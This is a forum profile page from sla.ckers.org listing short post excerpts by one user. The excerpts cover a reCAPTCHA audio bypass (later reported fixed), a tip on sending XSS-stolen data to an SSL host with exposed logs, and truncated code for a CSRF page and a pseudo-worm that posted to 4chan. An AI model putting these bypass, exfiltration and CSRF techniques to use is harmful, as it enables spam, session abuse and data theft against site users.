Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Current Page: 1 of 1
Results 1 - 5 of 5
4 years ago
Skuld
Seems to be fixed. > reCAPTCHA Support > From: reCAPTCHA Support <supp...@recaptcha.net> > Date: Tue, 3 Aug 2010 04:05:00 -0400 > Subject: Re: Does not stop spam > > Hi all, > > We've pushed a change which fixes the problem with the audio CAPTCHA. > Thanks to everyone who brought it to our attention. > > Best, > The reCAPTCHA team
Forum: Robots/Spiders/CAPTCHAs, oh my
4 years ago
Skuld
Apparently the audio captcha from reCAPTCHA doesn't actually validate anything, it only looks for a certain number of words. Just click on the audio captcha option and type in ten random words to pass the captcha. Seems like a hell of a bug to me, hope it's fixed soon.
Forum: Robots/Spiders/CAPTCHAs, oh my
4 years ago
Skuld
Send it to a site with a valid SSL cert. There may be some free hosts with SSL or you could try sending the data to a site with SSL and exposed logs.
Forum: XSS Info
6 years ago
Skuld
Here is post.htm. <script language="JavaScript" src="http://scripts.hashemian.com/js/visitorIPHOST.js.php"></script> <script type="text/javascript" language="Javascript"><!-- document.write("<fo"+"rm name='post' action='http://dat.4chan.org/b/imgboard.php' method='POST' enctype='multipart/form-data'>" +&qu
Forum: CSRF and Session Info
6 years ago
Skuld
If any of you ever go to 4chans /b/ board, you might find this interesting. There is at this moment a pseudo-worm propagating on /b/ using csrf and social engineering to spread. Here is the code it's using. var list = []; list[0] = "Read_about_Scientology's_'secular_book_of_morals'_recruitment_program_from_their_own_documents."; list[1] = "Truth_be_known,_those_silly_MooSlimes_
Forum: CSRF and Session Info
Current Page: 1 of 1